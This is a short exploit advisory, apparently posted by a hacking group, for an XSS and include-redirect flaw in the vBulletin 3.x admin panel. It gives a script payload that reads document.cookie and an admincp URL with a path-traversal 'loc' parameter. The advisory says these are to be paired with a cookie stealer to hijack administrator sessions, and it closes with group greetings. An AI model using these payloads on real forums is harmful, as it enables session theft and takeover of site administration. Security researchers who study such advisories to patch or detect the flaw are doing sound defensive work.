vbulinclude-xss.txt

`+--------------------------------------------------------------------  
+  
+ New Include Redirect Bug XSS All vBulletin® v 3.x.x  
+  
+--------------------------------------------------------------------  
+ vendor site........: http://www.vbulletin.com/  
+ Affected Software .: vbulletin  
+ Class .............: XSS  
+ Risk ..............: Low  
+ Found by ..........: rUnViRuS  
+ Original advisory .: http://www.sec-area.com/  
+ Contact ...........: stormhacker[at]hotmail[.]com  
+  
+--------------------------------------------------------------------  
New Include Redirect Bug XSS All vBulletin v 3.x.x  
  
This injections would allow an attacker to Include Redirect Admin to a page of his choice, effectively  
Xss the page and steal cookie :  
  
xss permanent ( must be Upload any File on Site Have Xss code ) PoC :  
  
<script>alert(document.cookie)</script>.  
  
to be used with cookie stealer following is a simple attack :-  
  
http://localhost/vb/admincp/index.php?loc=../../../nez.txt  
  
When opened url Will stealing cookies  
+--------------------------------------------------------------------  
+ [W]orld [D]efacers [T]eam  
+ Greets:  
+ || rUnViRuS || - || Provide || - || HeX || - || dEv!L RoOT || + || BlackWHITE || - || dOcnok || - || A.tar0uDant.D ||  
+ || Pro Hacker || - || DARKFIRE || - || papipsycho ||  
+ Sp.Thanx To : Sec-Area.com Member's  
+-------------------------[ W D T ]----------------------------------  
`